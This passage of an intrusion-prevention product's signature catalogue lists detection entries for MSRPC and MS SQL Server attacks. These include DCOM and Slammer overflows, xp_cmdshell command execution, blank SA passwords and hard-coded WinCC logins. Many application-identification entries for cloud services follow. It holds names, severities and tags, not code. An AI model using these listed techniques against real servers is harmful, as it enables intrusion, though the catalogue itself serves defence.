Context: UDP MSRPC Client Stream
Severity: 2
Tags: Windows, x86, Windows not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-104-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: MSRPC-Big-Endian-Byte-Order-Used
Description:
Back to top

MSRPC-UDP_CPS-DCOM-RPC-Servername-BOF

About this situation: RPC DCOM servername buffer overflow (MS03-26)
Context: MSRPC UDP Request Stream
Severity: 10
Tags: Windows XP, Windows NT, Windows 2000, Windows 2003, x86, Windows DCOM RPC Service, MS2003, CVE2003, Windows XP not specific, Windows NT not specific, Windows 2000 not specific, Windows 2003 not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: DCOM-RPC-BOF-MS03-026
Description:
Back to top

MSRPC-UDP_CPS-Messenger-BOF-MS03-043

About this situation: Windows Messenger Buffer Overflow (MS03-043)
Context: MSRPC UDP Request Stream
Severity: 10
Tags: Windows, x86, Windows Messenger, MS2003, CVE2003, Windows not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-218-3038
Vulnerability: MS03-043
Description:
Back to top

MSRPC-Unidentified-Uuid

About this situation: MSRPC protocol traffic to an unidentified UUID
Context: Application Context
Severity: 1
Tags: Protocols, Miscellaneous
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-1139-5242
Description: MSRPC is an interprocess communication technique that allows client and server software to communicate. This application matches if the UUID used for this MSRPC request has not been identified by a more specific application (e.g. Microsoft-Exchange).
Back to top

MSRPC_Bind-Alter-Multiple-Interfaces

About this situation: MSRPC Bind or Alter Context request with multiple interfaces
Context: MSRPC Bind or Alter Context with multiple interfaces
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-596-5211
Description: The client has sent a Bind or Alter Context request and the amount of interfaces has exceeded the allowed limit. Risk analysis: Risk level is low.
Back to top

MSRPC_Changed-Byte-Order

About this situation: MSRPC byte order changed
Context: MSRPC without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-425-4219
Description: The byte order of MSRPC messages changed in the middle of the stream or datagram. This does not usually happen and can be a sign of an IDS evasion attempt.
Back to top

MSRPC_EPM-Invalid-Call-ID

About this situation: MSRPC End Point Mapper protocol violation
Context: MSRPC without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description: Invalid Call ID was detected in MSRPC End Point Mapper session. This situation can occur if client or server do not use same Call ID during the session.
Back to top

MSRPC_EPM-Invalid-Operation-Number

About this situation: MSRPC End Point Mapper protocol violation
Context: MSRPC without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description: Invalid operation number was detected in MSRPC End Point Mapper session. This situation can occur if client defines invalid operation number in End Point Mapper map request.
Back to top

MSRPC_EPM-Invalid-State-Transition

About this situation: MSRPC End Point Mapper protocol violation
Context: MSRPC without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description: Invalid state transition was detected in MSRPC End Point Mapper session. This situation can occur if protocol message order is not followed by client or server.
Back to top

MSRPC_EPM-Unallowed-Service

About this situation: MSRPC End Point Mapper protocol violation
Context: MSRPC without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description: Not allowed MSRPC end point mapper service detected. This situation can occur if MSRPC service is not configured to operate in compatibility mode.
Back to top

MSRPC_Invalid-Fragment-Length

About this situation: MSRPC response with an invalid fragment length
Context: MSRPC without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-637-5211
Last changed: sgpkg-ips-637-5211
Description: An MSRPC response with too short fragment length was detected. This might be an evasion attempt.
Back to top

MSRPC_MSRPC-Detected

About this situation: MSRPC protocol message detected
Context: MSRPC without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-576-5211
Description: Inspection module has determined that the message is using MSRPC protocol.
Back to top

MSRPC_Multiple-Transfer-Syntaxes

About this situation: MSRPC server accepted multiple transfer syntaxes
Context: MSRPC without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-499-5211
Description: The MSRPC server accepted multiple transfer syntaxes. This does not usually happen.
Back to top

MSRPC_Not-MSRPC

About this situation: The connection does not look like using MSRPC
Context: MSRPC without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-576-5211
Description: The connection does not look like using MSRPC.
Back to top

MSRPC_Parsing-Error

About this situation: MSRPC protocol parsing error
Context: MSRPC without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-627-5211
Description: Inspection module was not able to parse the MSRPC protocol message.
Back to top

MSRPC_Request-Without-Bind

About this situation: MSRPC request without bind to an interface
Context: MSRPC without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-595-5211
Description: Microsoft Remote Producedure Call (RPC) request without bind to a particular interface was detected. This kind of a request lacks context and should always fail. This situation will also match when the bind has not been seen, which may happen with capture mode interfaces.
Back to top

MSRPC_SS-Microsoft-Windows-RPC-Runtime-Processbindackornak-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP MSRPC Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2022-04, CVE2022, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1477-5242
Last changed: sgpkg-ips-1477-5242
Vulnerability: Microsoft-Windows-RPC-Runtime-Processbindackornak-Integer-Overflow
Description:
Back to top

MSRPC_SS-Sourcefire-Snort-Rule20275eval-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Sourcefire Snort detected
Context: TCP MSRPC Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Snort, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-528-5211
Last changed: sgpkg-ips-528-5211
Vulnerability: Sourcefire-Snort-Rule20275eval-Buffer-Overflow
Description:
Back to top

MSRPC_UDP_Fragmentation-Loss

About this situation: Lost track of MSRPC UDP Request message fragments
Context: MSRPC without parameters
Severity: 2
Tags: Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-454-4333
Description: Inspection engine detected a fragment of connectionless MSRPC Request message without an appropriate state information. This can result from packet loss, anomalous MSRPC fragmentation or low memory in the inspection engine. This may be an intrusion detection evasion attempt. The fingerprinting for this connectionless MSRPC request message may be incomplete.
Back to top

MSSQL_Microsoft-SQL-Server-Blank-Sa-Password-Usage

About this situation: Detects attempts to access the SA account on a Microsoft SQL Server with a blank password
Context: TCP MSSQL Client Stream
Severity: 7
Tags: Windows 2000, Windows NT 4.0, Any Hardware, Microsoft SQL Server, Windows 2000 not specific, Windows NT 4.0 not specific, Microsoft SQL Server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-122-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-SQL-Server-Blank-Sa-Password-Usage
Description:
Back to top

MSSQL_Microsoft-SQL-Server-Convert-Function-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in the CONVERT function in Microsoft SQL Server detected
Context: TCP MSSQL Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft SQL Server, MS2008-07, CVE2008, Windows not specific, Microsoft SQL Server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-159-2032
Last changed: sgpkg-ips-159-2032
Vulnerability: MSSQL_Microsoft-SQL-Server-Convert-Function-Buffer-Overflow
Description:
Back to top

MSSQL_Microsoft-SQL-Server-INSERT-Statement-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in the handling of the INSERT statement in Microsoft SQL Server detected
Context: TCP MSSQL Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft SQL Server 2005, MS2008-07, CVE2008, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-159-2032
Last changed: sgpkg-ips-159-2032
Vulnerability: MSSQL_Microsoft-SQL-Server-INSERT-Statement-Buffer-Overflow
Description:
Back to top

MSSQL_Microsoft-SQL-Server-Spreplwritetovarbin-Buffer Overflow

About this situation: Access to vulnerable function in Microsoft SQL Server detected
Context: TCP MSSQL Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft SQL Server 2005, MS2009-02, CVE2008, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-204-2032
Last changed: sgpkg-ips-204-2032
Vulnerability: MSSQL-MS-SQL-Server-Sp_replwritetovarbin-BOF
Description:
Back to top

MSSQL_Microsoft-SQL-Server-Tds-Packet-Fragment-Handling-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft SQL Server detected
Context: TCP MSSQL Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft SQL Server, CVE2004, Windows not specific, Microsoft SQL Server not specific, Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-142-2032
Last changed: sgpkg-ips-466-5211
Vulnerability: MSSQL_Microsoft-SQL-Server-Tds-Packet-Fragment-Handling-Vulnerability
Description:
Back to top

MSSQL_Microsoft-SQL-Server-Xp-Cmdshell-Command-Execution

About this situation: Detects attempts to execute operating system commands via xp_cmdshell
Context: TCP MSSQL Client Stream
Severity: 7
Tags: Windows 2000, Windows NT 4.0, Any Hardware, Microsoft SQL Server, Windows 2000 not specific, Windows NT 4.0 not specific, Microsoft SQL Server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-122-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-SQL-Server-Xp-Cmdshell-Command-Execution
Description:
Back to top

MSSQL_MS-SQL-Server-Pre-Authentication-BOF

About this situation: Attempt to exploit buffer overflow in MS SQL Server user authentication function
Context: TCP MSSQL Client Stream
Severity: 10
Tags: Windows 2000, Windows NT 4.0, Any Hardware, Microsoft SQL Server 2000, MS2002, CVE2002, Windows 2000 not specific, Windows NT 4.0 not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: MSSQL-MS-SQL-Server-Pre-Authentication-BOF
Description:
Back to top

MSSQL_MS-SQL-Server-Pre-Authentication-BOF-2

About this situation: Attempt to exploit buffer overflow in MS SQL Server user authentication function
Context: TCP MSSQL Client Stream
Severity: 10
Tags: Windows 2000, Windows NT 4.0, Any Hardware, Microsoft SQL Server 2000, MS2002, CVE2002, Windows 2000 not specific, Windows NT 4.0 not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-16-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: MSSQL-MS-SQL-Server-Pre-Authentication-BOF
Description:
Back to top

MSSQL_MS-SQL-Server-Resolution-Service-Stack-Overflow

About this situation: Stack overflow attempt against MSSQL Server Resolution Service
Context: UDP MSSQL Client Stream
Severity: 10
Tags: Windows, x86, Microsoft SQL Server 2000, MS2002, CVE2002, Windows not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-43-1210
Last changed: sgpkg-ips-409-4219
Vulnerability: MSSQL-Resolution-Service-Stack-Overflow
Description:
Back to top

MSSQL_MS-SQL-Server-XPs-Srv-Paraminfo-BOF

About this situation: Buffer overflow attempt against MSSQL Server using Extended Stored Procedure
Context: TCP MSSQL Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft SQL Server, MS2000, CVE2000, Windows not specific, Microsoft SQL Server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: MSSQL-NetBIOS-MS-SQL-Server-Xp-Displayparamstmt-BOF
MSSQL-NetBIOS-MS-SQL-Server-Xp-Printstatements-BOF
MSSQL-NetBIOS-MS-SQL-Server-Xp-Peekqueue-BOF
MSSQL-NetBIOS-MS-SQL-Server-Xp-Proxiedmetadata-BOF
MSSQL-NetBIOS-MS-SQL-Server-Xp-Updatecolvbm-BOF
MSSQL-NetBIOS-MS-SQL-Server-Xp-Showcolv-BOF
MSSQL-NetBIOS-MS-SQL-Server-Xp-Enumresultset-BOF
MSSQL-NetBIOS-MS-SQL-Server-Xp-SetSQLSecurity-BOF
Description:
Back to top

MSSQL_MS-SQL-Slammer-Worm-Propagation-Attempt

About this situation: Slammer worm propagation attempt
Context: UDP MSSQL Client Stream
Severity: 10
Tags: Windows, x86, Microsoft SQL Server 2000, MS2002, CVE2002, Windows not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: MSSQL-Resolution-Service-Stack-Overflow
Description:
Back to top

MSSQL_Perseus-Trojan-Infection-Traffic

About this situation: Perseus trojan infection traffic was detected
Context: TCP MSSQL Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1357-5242
Last changed: sgpkg-ips-1357-5242
Vulnerability: Perseus-Trojan-Infection-Traffic
Description:
Back to top

MSSQL_Rdbms-Engine-Elevation-Of-Privilege-Vulnerability-CVE-2016-7250

About this situation: A vulnerability in MS SQL
Context: TCP MSSQL Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft SQL Server, MS2016-11, CVE2016, Windows not specific, Microsoft SQL Server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-819-5242
Last changed: sgpkg-ips-819-5242
Vulnerability: MS-SQL-Rdbms-Engine-Elevation-Of-Privilege-Vulnerability-CVE-2016-7250
Description:
Back to top

MSSQL_Server-2000-0x08-DoS

About this situation: Attempt to exploit a flaw in Microsoft's SQL Server 2000
Context: UDP MSSQL Client Stream
Severity: 2
Tags: Windows, x86, Microsoft SQL Server 2000, CVE2002, Windows not specific, Potential Denial of Service
First detected in: sgpkg-ips-24-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: MSSQL-Server-2000-0x08-BOF
Description:
Back to top

MSSQL_Siemens-WinCC-Hard-Coded-Login

About this situation: Hard-coded login credentials for Siemens WinCC detected
Context: TCP MSSQL Client Stream
Severity: 7
Tags: Windows, Any Hardware, Siemens SIMATIC WinCC, CVE2010, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Siemens-WinCC-Hard-Coded-Login
Description:
Back to top

MTF

About this situation: Application MTF detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MTF is an IT supply customer and system support for SMEs as well as large companies.
Back to top

MTN-Business

About this situation: Application MTN-Business detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MTN is provider of communication services, offering cellular network access and business solutions.
Back to top

MTV3-Katsomo

About this situation: MTV3 Katsomo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-1128-5242
Description: MTV3 Katsomo is a Finnish tv program / video on-demand service.
Back to top

MuleSoft

About this situation: Application MuleSoft detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MuleSoft is a platform that helps to connect the applications, data and devices.
Back to top

MultCloud

About this situation: Application MultCloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MultCloud hepls you manage, migrate, transfer, copy, and move files between any cloud storage services.
Back to top

Murex

About this situation: Application Murex detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Murex has played a key role in proposing effective technology as a catalyst for growth and innovation in capital markets, through the design and implementation of integrated trading, risk management, processing and post-trade platforms.
Back to top

Music-Search-Engine

About this situation: Music Search Engine usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: A search engine used to search and download music files
Back to top

Mvelopes

About this situation: Application Mvelopes detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Mvelopes service enables online envelope budgeting without requiring the subscriber to use the traditional cash and envelopes method.
Back to top

Mvix-Digital-Signage

About this situation: Application Mvix-Digital-Signage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mvix is a turnkey provider of digital signage solutions with software for remotely managing multiple signage screens, content, playlists and playback schedules.
Back to top

Mwo

About this situation: MWO usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: MechWarrior Online is a free-to-play vehicular combat video game, officially launched during September 2013 by Piranha Games for Microsoft Windows.
Back to top

MX

About this situation: Application MX detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MX is redefining the way financial institutions interact with account holders by developing omnibanking technologies that enable and support a true omnichannel experience.
Back to top

MX-Save

About this situation: Application MX-Save detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MXSave provides cloud based email disaster recovery solutions for organizations that are serious about high email availability.
Back to top

MX-System

About this situation: Application MX-System detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MX System is designed to meet the demand for a flexible, comprehensive yet affordable aircraft maintenance system capable of providing the critical information required by todays operators maintenance component tracking, reliability analysis, maintenance planning, maintenance program, flight log administration, maintenance control, aircraft status, flight scheduling, parts purchasing and inventory control.
Back to top

MxToolbox

About this situation: Application MxToolbox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MxToolbox supports Internet operations by providing network diagnostic and lookup tools.
Back to top

My-Brain-Solutions

About this situation: Application My-Brain-Solutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: My Brain Solutions is an interactive online Brain Assessment service. Know Your Brain. Measure Your Brain. Improve Yourself. O
Back to top

My-Brute

About this situation: My Brute usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

My-Compliance-Office

About this situation: Application My-Compliance-Office detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MyComplianceOffice is a web-based software solution specifically designed for Investment Advisers, Hedge Funds, Private Equity, Venture Capital and Broker Dealers.
Back to top

My-CS-Link

About this situation: Application My-CS-Link detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cedars-Sinai's My CS-Link is a secure online tool that connects users to their personal health information.
Back to top

My-Custom-Event

About this situation: Application My-Custom-Event detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Event Manager is the complete e-commerce platform for large and small businesses that integrates all of the features you need into one easy to manage package.
Back to top

My-Customer-Cloud

About this situation: Application My-Customer-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: My Customer Cloud provides a live chat solution complete with API, allowing you to completely customize your chat service or build your own scalable, reliable real-time chat apps. Our flexible chat platform is based upon the XMPP standard and seamlessly integrates a variety of customer communication channels including website, SMS, instant messaging networks, and Twitter.
Back to top

My-Docs

About this situation: Application My-Docs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: My Docs is online file sharing, delivery and document storage for businesses and professionals.
Back to top

My-E-Mail

About this situation: My E-Mail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-773-5211
Description: This site is a Japanese web mail service that allows users to send and receive e mails.
Back to top

My-Ebook-Maker

About this situation: Application My-Ebook-Maker detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: My Ebook Maker allows you to create ebooks in the cloud. Download your ebooks in epub format ready for distribution to all popular ebook stores.
Back to top

My-Hult

About this situation: Application My-Hult detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hult's International Business School.
Back to top

My-Opera

About this situation: My Opera usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

My-Pochette

About this situation: My Pochette usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a Japanese web mail service that allows users to send and receive e mails.
Back to top

MyAccessLive

About this situation: Application MyAccessLive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MyAccessLive Cloud-based Identity and Access Management
Back to top

MyAddr

About this situation: MyAddr usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1128-5242
Description: MyAddr is a free SSL proxy that can be used to surf the Internet anonymously and to circumvent access limitations.
Back to top

Myadrenalin

About this situation: Application Myadrenalin detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Adrenalin is a web-based human resource software that automates the entire HR processes to boost productivity.
Back to top

MyBackup-Pro

About this situation: Application MyBackup-Pro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MyBackupPro privides ability to make Backup your Android device with the Android Backup app.
Back to top

MyCase

About this situation: Application MyCase detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MyCase, web-based practice management software for lawyers, was built to address the number one complaint across all State Bar Associations...insufficient attorney
Back to top

MyCaseRecords

About this situation: Application MyCaseRecords detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MyCaseRecords - web-based case management System for Substance Abuse Facilities, On-Demand Software for ADP facility automation.
Back to top

MyCheckFree

About this situation: Application MyCheckFree detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MyCheckFree helps to receive and pay bills with consumer electronic bill and payment provider - your Personal Online Bill Payment Center.
Back to top

MYCO-Suite

About this situation: Application MYCO-Suite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CRM, Project management, Sales, HR and Finance in one compact system.
Back to top

MyCrowd

About this situation: Application MyCrowd detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MyCrowd makes it easy to QA test your desktop and mobile website's and apps.
Back to top

MyCustomerData

About this situation: Application MyCustomerData detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MyCustomerData is provider of Card-Based Marketing Solutions
Back to top

MYDIGIPASS.COM

About this situation: Application MYDIGIPASS.COM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MYDIGIPASS.COM is a cloud-based authentication solution, which enables companies to secure access to their online content by authenticating users
Back to top

MyDomain

About this situation: Application MyDomain detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MyDomain is a business web hosting that offers business services such as
Back to top

Mydownloader

About this situation: Mydownloader usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: MyDownloader offers users permission to download and access to files hosted on other file-sharing sites.
Back to top

MyEconLab

About this situation: Application MyEconLab detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MyLab and Mastering is collection of online homework, tutorial, and assessment products designed with a single purpose in mind
Back to top

Myemail

About this situation: MyEmail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a web mail service that allows users to send and receive e mails.
Back to top

Myerp

About this situation: myERP usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: This service provides users a business management suite for billing, accounting, inventory and project management solutions.
Back to top

MyFax

About this situation: Application MyFax detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MyFax is a cloud-based fax business service.
Back to top

myFICO

About this situation: Application myFICO detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FICO provides analytics software and tools used across multiple industries to manage risk, fight fraud, build more profitable customer relationships, optimize operations and meet strict government regulations.
Back to top

MyFitnessPal

About this situation: MyFitnessPal usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Health, Application Routing
First detected in: sgpkg-ips-788-5211
Last changed: sgpkg-ips-788-5211
Description: MyFitnessPal is a diet and exercise tracking service. It allows inividual to monitor nutrient and caloric intake.
Back to top

MyFleet

About this situation: Application MyFleet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MyFleet is a GE Power and Water's Industrial Internet solution for decision support and asset operations management tools.
Back to top

MyFreshPoint

About this situation: Application MyFreshPoint detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
